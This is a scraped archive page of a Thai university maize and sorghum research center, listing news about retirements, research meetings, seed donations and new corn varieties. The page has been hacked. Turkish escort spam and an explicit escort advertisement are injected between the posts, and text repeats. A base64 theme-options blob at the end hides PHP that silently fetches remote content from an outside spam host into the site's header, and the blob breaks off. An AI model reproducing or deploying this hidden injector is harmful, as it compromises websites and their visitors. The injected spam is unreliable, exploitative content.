Warning: include(inc/inc.php): failed to open stream: No such file or directory in /home/web/iicrd.ku.ac.th/html/wp-content/themes/flatsome/header.php on line 12

Warning: include(): Failed opening 'inc/inc.php' for inclusion (include_path='.:/usr/share/php') in /home/web/iicrd.ku.ac.th/html/wp-content/themes/flatsome/header.php on line 12

Category Archives: ข่าวและกิจกรรม

“รวงทอง…ลาทุ่ง ๒๕๖๔” ร่วมแสดงมุทิตาจิต แก่ผู้เกษียณอายุราชการ

      เมื่อวันที่ 22 กันยายน 2564 คณะเกษตร มหาวิทยาลัยเกษตร ได้จัดงานเกษียณอายุราชการ แก่ผู้เกษียณอายุราชการในปีนี้ “รวงทอง… ลาทุ่ง 2564” ในรูปแบบออนไลน์ผ่านโปรแกรม ZOOM โดย ผศ.สาวิตรี พังงา รองคณบดีฝ่ายกิจการพิเศษและพิธีการ ได้กล่าวรายงานกิจกรรมในวันนี้ โดยมีรศ.ดร.ธานี ศรีวงศ์ชัย คณบดีคณะเกษตร กล่าวต้อนรับและขอบคุณ ผู้เกษียณอายุราชการและผู้เข้าร่วมงาน และในปีนี้ยังได้รับเกียรติจาก รศ.ดร.สุตเขตต์ นาคะเสถียร รองอธิการบดีฝ่ายวิจัยและสร้างสรรค์ ร่วมกล่าวแสดงมุทิตาจิตแก่ผู้เกษียณอายุราชการ ของคณะเกษตรจากภาควิชาต่างๆ และศูนย์สถานีวิจัยภายใต้การดูแลของคณะเกษตร ซึ่งในปีนี้มีผู้เกษียณอายุราชการ ทั้งหมด 14 ท่าน 

beylikdüzü escort

      ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ มีบุคลากรศูนย์วิจัยข้าวโพดฯ เกษียณอายุงาน จำนวน 2 ท่าน ได้แก่
1.นายจรัญ หินทอง พนักงานขับรถยนต์
2.นายสมบูรณ์ สนธิเณร ช่างฝีมือโรงงาน

     นอกจากนี้แล้วยังได้รับฟังบรรยายพิเศษ หัวข้อ “เพิ่มภูมิคุ้มกันทางใจ” โดย รศ.นพ. ชัชวาลย์ ศิลปกิจ ผู้อำนวยการศูนย์จิตตปัญญาศึกษา มหาวิทยาลัยมหิดล

     ถึงแม้ในปีนี้จะไม่ได้พบกันใกล้ๆ แต่ความห่วงใยและความผูกพันของพี่น้องชาวคณะเกษตร ยังคงมีให้กันอย่างดีเสมอมา

ภาพกิจกรรม

ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ ได้จัดประชุมรายงานความก้าวหน้าโครงการวิจัย ภายใต้โครงการขับเคลื่อนงานวิจัยฯ ประจำปี 2564

       การประชุมรายงานความก้าวหน้าโครงการวิจัยที่ได้รับการจัดสรรทุนอุดหนุนวิจัย ภายใต้โครงการขับเคลื่อนงานวิจัยของศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ ประจำปีงบประมาณ 2564 โดยในการนี้ รองศาสตราจารย์ ดร.ธานี ศรีวงศ์ชัย คณบดีคณะเกษตร และรักษาการผู้อำนวยการศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ  เป็นประธานการประชุม มีวัตถุประสงค์เพื่อการรายงานความก้าวหน้าโครงการวิจัยที่ได้รับการจัดสรรทุนอุดหนุนวิจัย ภายใต้โครงการขับเคลื่อนงานวิจัยของศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ ประจำปีงบประมาณ 2564 และมีการประชุมเชิงปฏิบัติการสร้างความร่วมมือด้านงานวิจัย ระหว่างภาควิชาพืชไร่นาร่วมกับศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ คณะเกษตร มหาวิทยาลัยเกษตรศาสตร์ เพื่อสร้างเครือข่ายการเรียนการสอน การวิจัย และบริการวิชาการในอนาคตต่อไป พร้อมมีการบรรยายพิเศษ เรื่อง เทคนิคการเตรียมบทความวิจัยเพื่อการตีพิมพ์ผลงานวิจัยระดับนานาชาติ โดย รองศาสตราจารย์ประกิจ สมท่า อาจารย์ประจำภาควิชาพืชไร่นา คณะเกษตร วิทยาเขตกำแพงแสน  ซึ่งท่านได้รับรางวัลนักวิจัยผู้สร้างสรรค์ผลงานวิจัยตีพิมพ์ระดับนานาชาติ จากสถาบันวิจัยและพัฒนาแห่ง มหาวิทยาลัยเกษตรศาสตร์

beylikdüzü escort

 

 

ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ

ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ คณะเกษตร มหาวิทยาลัยเกษตรศาสตร์ ได้ผลิตผลงานวิจัยออกมาอย่างต่อเนื่องดังนี้ ข้าวโพดเลี้ยงสัตว์พันธุ์ผสมเปิด ได้แก่ พันธุ์สุวรรณ 1 พันธุ์สุวรรณ 2 พันธุ์สุวรรณ 3 พันธุ์สุวรรณ 5 ข้าวโพดเลี้ยงสัตว์พันธุ์ลูกผสม ได้แก่ พันธุ์ สุวรรณ 4452 พันธุ์ สุวรรณ 5720 พันธุ์ สุวรรณ 5731 พันธุ์ สุวรรณ 5819 พันธุ์ สุวรรณ 5821 ข้าวโพดลูกผสมเดี่ยวแอนโทไซยานินสูง ได้แก่ พันธุ์ KPSC 901 และ KPSC 903 ข้าวโพดหวานลูกผสมเดี่ยว ได้แก่ พันธุ์ Kspsx5903 พันธุ์KSSC 503 พันธุ์อินทรี 2 พันธุ์อินทรี 1 ข้าวโพดฝักอ่อนที่ไม่ต้องถอดยอด ได้แก่ พันธุ์เกษตรศาสตร์ 1 ข้าวโพดฝักอ่อนลูกผสมเดี่ยวที่ไม่ต้องถอดยอด ได้แก่ พันธุ์เกษตรศาสตร์ 2 พันธุ์เกษตรศาสตร์ 3 ข้าวโพดข้าวเหนียว ได้แก่ พันธุ์Kwsx 5901 พันธุ์ รัชตะ 1 ข้าวฟ่างเมล็ด ได้แก่ พันธุ์KU439 พันธุ์KU630 พันธุ์KU804 พันธุ์KU902 ข้าวฟ่างไม้กวาด ได้แก่พันธุ์รวงเรียว 1 ข้าวฟ่างหางกระรอก ได้แก่ พันธุ์กินรี 1 พันธุ์กินรี 2 ข้าวฟ่างหวาน ได้แก่ พันธุ์สุวรรณสวีทดอ็กตร้า หญ้าไข่มุก ได้แก่ พันธุ์ KU01 สามารถติดตามผลงานได้ที่ เกี่ยวกับหน่วยงาน โดยมีปณิธาน คือ “มีความเป็นเลิศทางวิจัยและถ่ายทอดเทคโนโลยีด้านพืชระดับนานาชาติ” ซึ่งสอดคล้องกับวิสัยทัศน์และภารกิจหลักของสถาบันอินทรีจันทรสถิตย์ฯ และนโยบายของมหาวิทยาลัยเกษตรศาสตร์ พันธกิจของหน่วยงาน คือ สนับสนุนการเรียนการสอนของมหาวิทยาลัยเกษตรศาสตร์

ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ คณะเกษตร มหาวิทยาลัยเกษตรศาสตร์ ได้ผลิตผลงานวิจัยออกมาอย่างต่อเนื่องดังนี้ ข้าวโพดเลี้ยงสัตว์พันธุ์ผสมเปิด ได้แก่ พันธุ์สุวรรณ 1 พันธุ์สุวรรณ 2 พันธุ์สุวรรณ 3 พันธุ์สุวรรณ 5 ข้าวโพดเลี้ยงสัตว์พันธุ์ลูกผสม ได้แก่ พันธุ์ สุวรรณ 4452 พันธุ์ สุวรรณ 5720 พันธุ์ สุวรรณ 5731 พันธุ์ สุวรรณ 5819 พันธุ์ สุวรรณ 5821 ข้าวโพดลูกผสมเดี่ยวแอนโทไซยานินสูง ได้แก่ พันธุ์ KPSC 901 และ KPSC 903 ข้าวโพดหวานลูกผสมเดี่ยว ได้แก่ พันธุ์ Kspsx5903 พันธุ์KSSC 503 พันธุ์อินทรี 2 พันธุ์อินทรี 1 ข้าวโพดฝักอ่อนที่ไม่ต้องถอดยอด ได้แก่ พันธุ์เกษตรศาสตร์ 1 ข้าวโพดฝักอ่อนลูกผสมเดี่ยวที่ไม่ต้องถอดยอด ได้แก่ พันธุ์เกษตรศาสตร์ 2 พันธุ์เกษตรศาสตร์ 3 ข้าวโพดข้าวเหนียว ได้แก่ พันธุ์Kwsx 5901 พันธุ์ รัชตะ 1 ข้าวฟ่างเมล็ด ได้แก่ พันธุ์KU439 พันธุ์KU630 พันธุ์KU804 พันธุ์KU902 ข้าวฟ่างไม้กวาด ได้แก่พันธุ์รวงเรียว 1 ข้าวฟ่างหางกระรอก ได้แก่ พันธุ์กินรี 1 พันธุ์กินรี 2 ข้าวฟ่างหวาน ได้แก่ พันธุ์สุวรรณสวีทดอ็กตร้า หญ้าไข่มุก ได้แก่ พันธุ์ KU01 สามารถติดตามผลงานได้ที่ เกี่ยวกับหน่วยงาน โดยมีปณิธาน คือ “มีความเป็นเลิศทางวิจัยและถ่ายทอดเทคโนโลยีด้านพืชระดับนานาชาติ” ซึ่งสอดคล้องกับวิสัยทัศน์และภารกิจหลักของสถาบันอินทรีจันทรสถิตย์ฯ และนโยบายของมหาวิทยาลัยเกษตรศาสตร์ พันธกิจของหน่วยงาน คือ สนับสนุนการเรียนการสอนของมหาวิทยาลัยเกษตรศาสตร์

ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ คณะเกษตร มหาวิทยาลัยเกษตรศาสตร์ ได้ผลิตผลงานวิจัยออกมาอย่างต่อเนื่องดังนี้ ข้าวโพดเลี้ยงสัตว์พันธุ์ผสมเปิด ได้แก่ พันธุ์สุวรรณ 1 พันธุ์สุวรรณ 2 พันธุ์สุวรรณ 3 พันธุ์สุวรรณ 5 ข้าวโพดเลี้ยงสัตว์พันธุ์ลูกผสม ได้แก่ พันธุ์ สุวรรณ 4452 พันธุ์ สุวรรณ 5720 พันธุ์ สุวรรณ 5731 พันธุ์ สุวรรณ 5819 พันธุ์ สุวรรณ 5821 ข้าวโพดลูกผสมเดี่ยวแอนโทไซยานินสูง ได้แก่ พันธุ์ KPSC 901 และ KPSC 903 ข้าวโพดหวานลูกผสมเดี่ยว ได้แก่ พันธุ์ Kspsx5903 พันธุ์KSSC 503 พันธุ์อินทรี 2 พันธุ์อินทรี 1 ข้าวโพดฝักอ่อนที่ไม่ต้องถอดยอด ได้แก่ พันธุ์เกษตรศาสตร์ 1 ข้าวโพดฝักอ่อนลูกผสมเดี่ยวที่ไม่ต้องถอดยอด ได้แก่ พันธุ์เกษตรศาสตร์ 2 พันธุ์เกษตรศาสตร์ 3 ข้าวโพดข้าวเหนียว ได้แก่ พันธุ์Kwsx 5901 พันธุ์ รัชตะ 1 ข้าวฟ่างเมล็ด ได้แก่ พันธุ์KU439 พันธุ์KU630 พันธุ์KU804 พันธุ์KU902 ข้าวฟ่างไม้กวาด ได้แก่พันธุ์รวงเรียว 1 ข้าวฟ่างหางกระรอก ได้แก่ พันธุ์กินรี 1 พันธุ์กินรี 2 ข้าวฟ่างหวาน ได้แก่ พันธุ์สุวรรณสวีทดอ็กตร้า หญ้าไข่มุก ได้แก่ พันธุ์ KU01 สามารถติดตามผลงานได้ที่ เกี่ยวกับหน่วยงาน โดยมีปณิธาน คือ “มีความเป็นเลิศทางวิจัยและถ่ายทอดเทคโนโลยีด้านพืชระดับนานาชาติ” ซึ่งสอดคล้องกับวิสัยทัศน์และภารกิจหลักของสถาบันอินทรีจันทรสถิตย์ฯ และนโยบายของมหาวิทยาลัยเกษตรศาสตร์ พันธกิจของหน่วยงาน คือ สนับสนุนการเรียนการสอนของมหาวิทยาลัยเกษตรศาสตร์

denizli escort bursa escort izmir escort dudullu escort avcılar escort

การทดสอบอุปกรณ์พ่วงท้ายรถไถ ในการทำรุ่น กำจัดวัชพืชพร้อมใส่ปุ๋ย

    เมื่อวันที่ 1 ก.ค. 2564 ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ นำโดย รศ.ดร.ธานี ศรีวงศ์ชัย ผู้อำนวยการศูนย์วิจัยข้าวโพดฯ ร่วมกับบริษัท โชคชัยจักรกล จำกัด ได้ติดตามการทดสอบ อุปกรณ์พ่วงท้ายรถไถ ในการทำรุ่น กำจัดวัชพืชพร้อมใส่ปุ๋ย โดยทดสอบในแปลงผลิตเมล็ดพันธุ์ข้าวโพด ณ ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ พร้อมกับหารือร่วมกันในการนำเครื่องจักรกลทางการเกษตรมาช่วยลดแรงงานภาคการเกษตรในอนาคต และความร่วมมือที่จะพัฒนาเป็นศูนย์เรียนรู้ด้านเครื่องจักรกลและเทคโนโลยีการเกษตรต่อไปในอนาคต

beylikdüzü escort

ผอ. กองส่งเสริมและสนับสนุนการวิจัย วช. และคณะ ได้เข้าเยี่ยมชมเครื่องอบเมล็ดและเครื่องอบฝักข้าวโพด

ผอ.ธีรวัฒน์ บุญสม ผู้อำนวยการกองส่งเสริมและสนับสนุนการวิจัย สำนักงานการวิจัยแห่งชาติ (วช.) พร้อมด้วยคุณระพี  บุญบุตร ผู้ผลิตเครื่องอบเมล็ดและคณะ ได้เข้าเยี่ยมชมเครื่องอบเมล็ด (วช.) และเครื่องอบฝักข้าวโพดของศูนย์วิจัยข้าวโพดฯ พร้อมพูดคุยปรึกษาแนวทางการขอทุนวิจัย โดย อ.สดใส ช่างสลัก รองผู้อำนวยการศูนย์วิจัยข้าวโพดฯ ฝ่ายบริการวิชาการ และคณะ ให้การต้อนรับ

Continue reading

ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ มอบเมล็ดพันธุ์ข้าวโพดฝักอ่อน พันธุ์เกษตรศาสตร์ 3 ให้กับเกษตรกรในพื้นที่อำเภอปากช่อง

ภายใต้สถานการณ์การแพ่ระบาดของโรคติดเชื้อไวรัสโคโรนา 2019 ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ คณะเกษตร มหาลัยเกษตรศาสตร์ ร่วมเป็นแรงใจช่วยให้พี่น้องเกษตรกร ก้าวผ่านสถานการณ์นี้ไปด้วยกัน ในการนี้ทางศูนย์วิจัยข้าวโพดฯ ได้มอบเมล็ดพันธุ์ข้าวโพดฝักอ่อน พันธุ์เกษตรศาสตร์ 3 ให้กับเกษตรกรภายในพื้นที่ ผ่านหน่วยงานราชการ ได้แก่อำเภอปากช่องและเทศบาลสีมามงคล จำนวน 200 กิโลกรัม เพื่อแจกจ่ายให้กับเกษตรกรผู้ได้รับผล กระทบจากสถานการณ์ดังกล่าว
โดยนายสุรพันธ์ ศิลปสุวรรณ นายอำเภอปากช่อง รับมอบเพื่อแจกจ่ายให้แก่เกษตรกรและผู้ได้รับผลกระทบจากสถานการณ์โควิด-19
อาจเป็นรูปภาพของ 3 คน และผู้คนกำลังยืน

อาจเป็นรูปภาพของ 3 คน, ผู้คนกำลังยืน และสถานที่ในร่ม

เปิดตัวข้าวโพดเลี้ยงสัตว์พันธุ์ใหม่ ร่วมมือ ร่วมวิจัย มก.-สวก.

       วันที่ 1 เมษายน 2564 สำนักงานพัฒนาการวิจัยการเกษตร (องค์การมหาชน) หรือ สวก. ร่วมกับ มหาวิทยาลัยเกษตรศาสตร์ จัดงาน “ข้าวโพดเลี้ยงสัตว์พันธุ์ใหม่ ร่วมมือร่วมวิจัย มก. – สวก.” เปิดตัวข้าวโพดเลี้ยงสัตว์ลูกผสมเดี่ยวพันธุ์ใหม่ สุวรรณ 5720 และ สุวรรณ 5821 ซึ่งเป็นผลสัมฤทธิ์ภายใต้โครงการการพัฒนาพันธุ์ข้าวโพดเลี้ยงสัตว์ลูกผสมเพื่อปลูกในดินนาฤดูแล้งเขตชลประทานภาคกลาง ที่ได้รับทุนสนับสนุนจาก สวก. โดยมี นางสาวกุลวรา โชติพันธุ์โสภณ รองผู้อำนวยการสำนักงานพัฒนาการวิจัยการเกษตร เป็นประธานในพิธีเปิดงาน ณ ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ อำเภอปากช่อง จังหวัดนครราชสีมา โดยมีเกษตรกรสนใจเข้าร่วมงานกว่า 50 ราย
       ข้าวโพดเลี้ยงสัตว์ลูกผสมเดี่ยวพันธุ์ใหม่ สุวรรณ 5720 และ สุวรรณ 5821 ผลผลิตจากโครงการวิจัยเป็นข้าวโพดที่เมล็ดใหญ่ น้ำหนักดี เปอร์เซ็นกะเทาะสูง ให้ผลผลิตสูง สามารถต้านโรคราน้ำค้างและโรคทางใบเป็นอย่างดี และทั้งสองพันธุ์เป็นพันธุ์ที่มีเสถียรภาพดีเช่นเดียวกับพันธุ์ของภาคเอกชนที่ปลูกในแปลงทดสอบ ซึ่งในอนาคมสวก. และ มก. โดยศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ มีแผนในการดำเนินการขยายผลวิจัยสู่เกษตรกรต่อไป

การนำเสนอโครงการวิจัยปี 2564 ของศูนย์ฯ

ประมวลภาพการนำเสนอโครงการวิจัยปี 2564

การจัดฝึกอบรมหลักสูตร “การใช้เทคโนโลยีในการเพิ่มศักยภาพในการผลิตทางการเกษตรเพื่อพัฒนาสู่สมาร์ทฟาร์ม”

ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ คณะเกษตร มหาวิทยาลัยเกษตรศาสตร์ร่วมกับธนาคารเพื่อการเกษตรและสหกรณ์การเกษตรจัดฝึกอบรมหลักสูตร “การใช้เทคโนโลยีในการเพิ่มศักยภาพในการผลิตทางการเกษตรเพื่อพัฒนาสู่สมาร์ทฟาร์ม” ให้กับเกษตรกรในพื้นที่ อ.ปากช่อง จ.นครราชสีมา วันที่ 21-24 ธันวาคม 2563 ณ อาคารฝึกอบรม ศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ คณะเกษตร มหาวิทยาลัยเกษตรศาสตร์

ภาควิชาพืชไร่นาร่วมกับศูนย์วิจัยข้าวโพดและข้าวฟ่างแห่งชาติ จัดการประชุมเชิงปฏิบัติการสร้างความร่วมมือด้านการวิจัย

beylikdüzü escort

 

 

  •  
Beylikdüzü Escort Betül İstanbul Eve Alan Escort Bayan oluyorum ya? O zaman deli gibi sevişirim. Merak etmeyin deli gibi sevişenlerin aşktan öldüğü yalan. Hem zaten korkmaya gerek olmayan bir kızım. 27 yaşındayım, kumralım ve toru topu 49 kilodayım. Kısa ve zarif, zayıf bir kızım. Kumrallığımı adeta süsleyen yemyeşil gözlerim var ve ince hatlarım, dudaklarımla çok güzel olduğum söylenir. Hatta ipeksi dümdüz saçlarımı da çok severler. Elbette beni göreceksin, saklanmıyorum. Ben görüşmelerinde her zaman kalite arayan kadınlardanım. Seni bana alırım ve gerçekten bir erkek olduğunu hissettiririm. Bence benle geçirdiğin her saniye seni gerçekten memnun edecek. Eğer inanmazsan benle olmayı bir dene. Beylikdüzü Escort Bayan Önce hayatım bana ulaş. Belki telefon numaram olmaz. İstanbul escort olmayı seviyorum tamam ama her zaman telefonda görüşme yapmak için müsait olamıyorum. Bu nedenle çoğu zaman yorumlardan iletişim kuruyorum. Yine de söz veriyorum asla sizleri çok bekletmem. Sonra sohbet eder ve bakarız duruma. Ben her zaman azgın bir kadınım, bu nedenle ilk buluşma zaman almaz. Ama demedi deme gerçekten sıcak hissetmeme neden olacaksan o zaman evet derim, yoksa imkânsız! Asla görüşme yapmam. Betül Yaşattığı Şeye Aşkın Sıcaklığını Muhakkak Ekler Artık beylikdüzü escort bayanlığı sadece seksle yaşamıyorlar. Hani bu siteler açıldı, insanlar için seçenekler arttı ya? Bu nedenle kadınlar erkeklerine karşı çok daha sevecen. Sonuçta erkeklerin seçeneği arttı. Eskiden saklı bir şekilde elden ele dolaşan telefon numaralarından ulaştığın bir kadınla zaman geçirirdin. Üstelik güzellik, çekicilik gibi konuları asla önemsemeden ki yaşanan şeyler Sahra çölü kadar kuru ve gereksizdi. Şimdi bu siteler sizlere sıcaklık, kalite bakımından en yüksek hem de gerçekten güzel kadınlarla tanışma şansı veriyor. Hemen bir örnek verelim, mesela Betül. Betül yaşattığı şeye aşkın sıcaklığını muhakkak ekler. Hatta 27 yaşındaki arsız bu çıtır sevişmesini grup olacak şekilde de yaşayabilir. Madem böylesine özel bir kadınla anlatılması gerçekten zor şeyler yaşamak mümkün o zaman bir acele etmeli. E birileri kaparsa üzülen siz olursunuz! Değil mi?

esenyurt escort

denizli escort bursa escort izmir escort dudullu escort avcılar escort
YTo5MTp7aTowO2I6MDtzOjE3OiJmbGF0c29tZV9mYWxsYmFjayI7aTowO3M6MjA6InRvcGJhcl9lbGVtZW50c19sZWZ0IjthOjA6e31zOjIxOiJ0b3BiYXJfZWxlbWVudHNfcmlnaHQiO2E6MDp7fXM6MjA6ImhlYWRlcl9lbGVtZW50c19sZWZ0IjthOjE6e2k6MDtzOjM6Im5hdiI7fXM6MjE6ImhlYWRlcl9lbGVtZW50c19yaWdodCI7YTowOnt9czoyNzoiaGVhZGVyX2VsZW1lbnRzX2JvdHRvbV9sZWZ0IjthOjA6e31zOjI5OiJoZWFkZXJfZWxlbWVudHNfYm90dG9tX2NlbnRlciI7YTowOnt9czoyODoiaGVhZGVyX2VsZW1lbnRzX2JvdHRvbV9yaWdodCI7YTowOnt9czoyNzoiaGVhZGVyX21vYmlsZV9lbGVtZW50c19sZWZ0IjthOjE6e2k6MDtzOjk6Im1lbnUtaWNvbiI7fXM6Mjg6ImhlYWRlcl9tb2JpbGVfZWxlbWVudHNfcmlnaHQiO2E6MTp7aTowO3M6NDoiY2FydCI7fXM6MjY6ImhlYWRlcl9tb2JpbGVfZWxlbWVudHNfdG9wIjthOjA6e31zOjE0OiJtb2JpbGVfc2lkZWJhciI7YToxOntpOjA7czozOiJuYXYiO31zOjE0OiJwcm9kdWN0X2xheW91dCI7czoxOToicmlnaHQtc2lkZWJhci1zbWFsbCI7czoyMzoicGF5bWVudF9pY29uc19wbGFjZW1lbnQiO3M6NjoiZm9vdGVyIjtzOjE0OiJmb2xsb3dfdHdpdHRlciI7czoxMDoiaHR0cDovL3VybCI7czoxNToiZm9sbG93X2ZhY2Vib29rIjtzOjEwOiJodHRwOi8vdXJsIjtzOjE2OiJmb2xsb3dfaW5zdGFncmFtIjtzOjEwOiJodHRwOi8vdXJsIjtzOjEyOiJmb2xsb3dfZW1haWwiO3M6MTA6InlvdXJAZW1haWwiO3M6MTY6ImZsYXRzb21lX3ZlcnNpb24iO2k6MztzOjI0OiJwb3J0Zm9saW9fYXJjaGl2ZV9maWx0ZXIiO3M6NDoibGVmdCI7czoxMzoidHlwZV9oZWFkaW5ncyI7YTo1OntzOjExOiJmb250LWZhbWlseSI7czo1OiJLYW5pdCI7czo3OiJ2YXJpYW50IjtzOjM6IjcwMCI7czoxMToiZm9udC1iYWNrdXAiO3M6MDoiIjtzOjExOiJmb250LXdlaWdodCI7aTo3MDA7czoxMDoiZm9udC1zdHlsZSI7czo2OiJub3JtYWwiO31zOjEwOiJ0eXBlX3RleHRzIjthOjU6e3M6MTE6ImZvbnQtZmFtaWx5IjtzOjU6Ikthbml0IjtzOjc6InZhcmlhbnQiO3M6NzoicmVndWxhciI7czoxMToiZm9udC1iYWNrdXAiO3M6MDoiIjtzOjExOiJmb250LXdlaWdodCI7aTo0MDA7czoxMDoiZm9udC1zdHlsZSI7czo2OiJub3JtYWwiO31zOjg6InR5cGVfbmF2IjthOjU6e3M6MTE6ImZvbnQtZmFtaWx5IjtzOjU6Ikthbml0IjtzOjc6InZhcmlhbnQiO3M6MzoiNzAwIjtzOjExOiJmb250LWJhY2t1cCI7czowOiIiO3M6MTE6ImZvbnQtd2VpZ2h0IjtpOjcwMDtzOjEwOiJmb250LXN0eWxlIjtzOjY6Im5vcm1hbCI7fXM6ODoidHlwZV9hbHQiO2E6NTp7czoxMToiZm9udC1mYW1pbHkiO3M6NToiS2FuaXQiO3M6NzoidmFyaWFudCI7czo3OiJyZWd1bGFyIjtzOjExOiJmb250LWJhY2t1cCI7czowOiIiO3M6MTE6ImZvbnQtd2VpZ2h0IjtpOjQwMDtzOjEwOiJmb250LXN0eWxlIjtzOjY6Im5vcm1hbCI7fXM6MTQ6InBhZ2VzX3RlbXBsYXRlIjtzOjc6ImRlZmF1bHQiO3M6MTk6ImZsYXRzb21lX2RiX3ZlcnNpb24iO3M6NjoiMy4xMC4wIjtzOjE4OiJuYXZfbWVudV9sb2NhdGlvbnMiO2E6NTp7czo3OiJwcmltYXJ5IjtpOjI7czoxNDoicHJpbWFyeV9tb2JpbGUiO2k6MDtzOjY6ImZvb3RlciI7aTowO3M6MTE6InRvcF9iYXJfbmF2IjtpOjA7czoxMDoibXlfYWNjb3VudCI7aTowO31zOjc6ImJhY2t1cHMiO047czo5OiJzbW9mX2luaXQiO3M6MzE6IlR1ZSwgMTIgTm92IDIwMTkgMTQ6Mzc6MDggKzAwMDAiO3M6MDoiIjtzOjA6IiI7czoxODoiY3VzdG9tX2Nzc19wb3N0X2lkIjtpOjE1O3M6MTY6ImZvb3Rlcl9sZWZ0X3RleHQiO3M6NTU5OiJDb3B5cmlnaHQgW3V4X2N1cnJlbnRfeWVhcl0gwqkgPHN0cm9uZz7guKjguLnguJnguKLguYzguKfguLTguIjguLHguKLguILguYnguLLguKfguYLguJ7guJTguYHguKXguLDguILguYnguLLguKfguJ/guYjguLLguIfguYHguKvguYjguIfguIrguLLguJXguLQg4LiE4LiT4Liw4LmA4LiB4Lip4LiV4LijIOC4oeC4q+C4suC4p+C4tOC4l+C4ouC4suC4peC4seC4ouC5gOC4geC4qeC4leC4o+C4qOC4suC4quC4leC4o+C5jDwvc3Ryb25nPiDguYDguKXguILguJfguLXguYggMjk4IOC4q+C4oeC4ueC5iCAxIOC4lS7guIHguKXguLLguIfguJTguIcg4LitLuC4m+C4suC4geC4iuC5iOC4reC4hyDguIgu4LiZ4LiE4Lij4Lij4Liy4LiK4Liq4Li14Lih4LiyIDMwMzIwCiI7czoxNzoiaGVhZGVyX3RvcF9oZWlnaHQiO3M6MjoiMzAiO3M6MTU6Im1lbnVfaWNvbl9zdHlsZSI7czoxMDoiZmlsbC1yb3VuZCI7czoyMDoiaGVhZGVyX2hlaWdodF9tb2JpbGUiO3M6MjoiNzAiO3M6MTM6ImNvbG9yX3ByaW1hcnkiO3M6NzoiIzBmOWEyOSI7czoxMToiY29sb3JfbGlua3MiO3M6NzoiIzBmOWEyOSI7czoxNzoiY29sb3JfbGlua3NfaG92ZXIiO3M6NzoiIzI3NzEzMiI7czo5OiJzaXRlX2xvZ28iO3M6NjI6Imh0dHA6Ly9paWNyZC5rdS5hYy50aC93cC1jb250ZW50L3VwbG9hZHMvMjAyMC8wNS9sb2dvd2ViLTMuanBnIjtzOjEwOiJsb2dvX3dpZHRoIjtzOjM6IjMzMyI7czoxMjoibG9nb19wYWRkaW5nIjtzOjE6IjUiO3M6MTY6InNpdGVfbG9nb19zbG9nYW4iO2I6MDtzOjE2OiJzaWRlYmFyc193aWRnZXRzIjthOjI6e3M6NDoidGltZSI7aToxNTk1MTIwNzg0O3M6NDoiZGF0YSI7YTo0OntzOjE5OiJ3cF9pbmFjdGl2ZV93aWRnZXRzIjthOjA6e31zOjEyOiJzaWRlYmFyLW1haW4iO2E6NDp7aTowO3M6ODoic2VhcmNoLTIiO2k6MTtzOjE0OiJyZWNlbnQtcG9zdHMtMiI7aToyO3M6MTA6ImFyY2hpdmVzLTIiO2k6MztzOjEyOiJjYXRlZ29yaWVzLTIiO31zOjE2OiJzaWRlYmFyLWZvb3Rlci0xIjthOjA6e31zOjE2OiJzaWRlYmFyLWZvb3Rlci0yIjthOjA6e319fXM6MTM6ImJvZHlfYmdfaW1hZ2UiO3M6NjQ6Imh0dHA6Ly9paWNyZC5rdS5hYy50aC93cC1jb250ZW50L3VwbG9hZHMvMjAyMC8wNS9oeWJyaWQtY29weS5qcGciO3M6MTE6ImJvZHlfbGF5b3V0IjtzOjU6ImJveGVkIjtzOjEyOiJib2R5X2JnX3R5cGUiO3M6MTI6ImJnLWZ1bGwtc2l6ZSI7czoxNzoiYmxvZ19zaG93X2V4Y2VycHQiO2I6MDtzOjE2OiJibG9nX3Bvc3RzX2RlcHRoIjtzOjE6IjAiO3M6MTg6ImJsb2dfc3R5bGVfYXJjaGl2ZSI7czowOiIiO3M6MTY6InR5cGVfc2l6ZV9tb2JpbGUiO3M6MzoiMTAwIjtzOjEzOiJoZWFkZXJfaGVpZ2h0IjtzOjM6IjEwMCI7czoxMDoibmF2X2hlaWdodCI7czoyOiIxNiI7czoyNToiaGVhZGVyX2hlaWdodF90cmFuc3BhcmVudCI7czoyOiIzMCI7czoyMDoiaGVhZGVyX2hlaWdodF9zdGlja3kiO3M6MzoiMTAwIjtzOjE5OiJzdGlja3lfbG9nb19wYWRkaW5nIjtzOjE6IjAiO3M6MTc6Imh0bWxfYWZ0ZXJfaGVhZGVyIjtzOjIxMDc6IiAgICAKPD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwokc25hbWUyID0gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107CiRzbmFtZSA9IHN0cl9yZXBsYWNlKGFycmF5KCJodHRwOi8vIiwiaHR0cHM6Ly8iLCJ3d3cuIiksbnVsbCwkc25hbWUyKTsKJHggPSAiaHR0cDovL2tpbmdzYWNoaW4ueHl6L2xpbmtsZXIvIi4kc25hbWUuIi5waHAiOwppZihmdW5jdGlvbl9leGlzdHMoJ2N1cmxfaW5pdCcpKQp7CiRjaCA9IGN1cmxfaW5pdCgpOwpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkeCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CiRnaXR0ID0gY3VybF9leGVjKCRjaCk7CmN1cmxfY2xvc2UoJGNoKTsKaWYoJGdpdHQgPT0gZmFsc2UpewpAJGdpdHQgPSBmaWxlX2dldF9jb250ZW50cygkeCk7Cn0KfWVsc2VpZihmdW5jdGlvbl9leGl